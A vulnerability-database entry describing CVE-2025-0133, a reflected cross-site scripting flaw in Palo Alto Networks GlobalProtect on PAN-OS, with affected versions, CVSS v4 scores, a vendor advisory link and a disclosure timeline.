Reflected XSS Vulnerability in Palo Alto Networks GlobalProtect PAN-OS
CVE-2025-0133

6.9MEDIUM

Key Information:

Vendor: Palo Alto Networks
Status: Pan-os
Vendor: CVE Published:; 14 May 2025

🔔 Create Palo Alto Networks Vulnerability Alert

Badges

👾 Exploit Exists

What is CVE-2025-0133?

A reflected cross-site scripting (XSS) vulnerability in Palo Alto Networks' GlobalProtect gateway and portal features allows attackers to execute malicious JavaScript in the authenticated browser session of Captive Portal users. When users click on specifically crafted links, they may unknowingly expose themselves to phishing attacks that can lead to credential theft, especially for those using Clientless VPN. Though there is no direct impact on the functionality of the GlobalProtect features or on content and configurations, this vulnerability poses a risk regarding user confidentiality if Clientless VPN is enabled. Users who disable this feature maintain a heightened level of security. For more information, refer to the advisory at Palo Alto Networks.

Affected Version(s)

PAN-OS 11.2.0 < 11.2.8

PAN-OS 11.1.0 < 11.1.11

PAN-OS 10.2.0 < 10.2.17

References

https://security.paloaltonetworks.com/CVE-2025-0133

vendor-advisory

CVSS V4

Score:

6.9

Severity:

MEDIUM

Confidentiality:

Low

Integrity:

Low

Availability:

None

Attack Vector:

Network

Attack Complexity:

Low

Attack Required:

None

Privileges Required:

Undefined

User Interaction:

None

Download the Critical Vulnerability Management Cheat Sheet

Timeline

👾
Exploit known to exist
May 14, 2025
Vulnerability published
May 14, 2025
Vulnerability Reserved
Dec 20, 2024

Credit

XBOW Security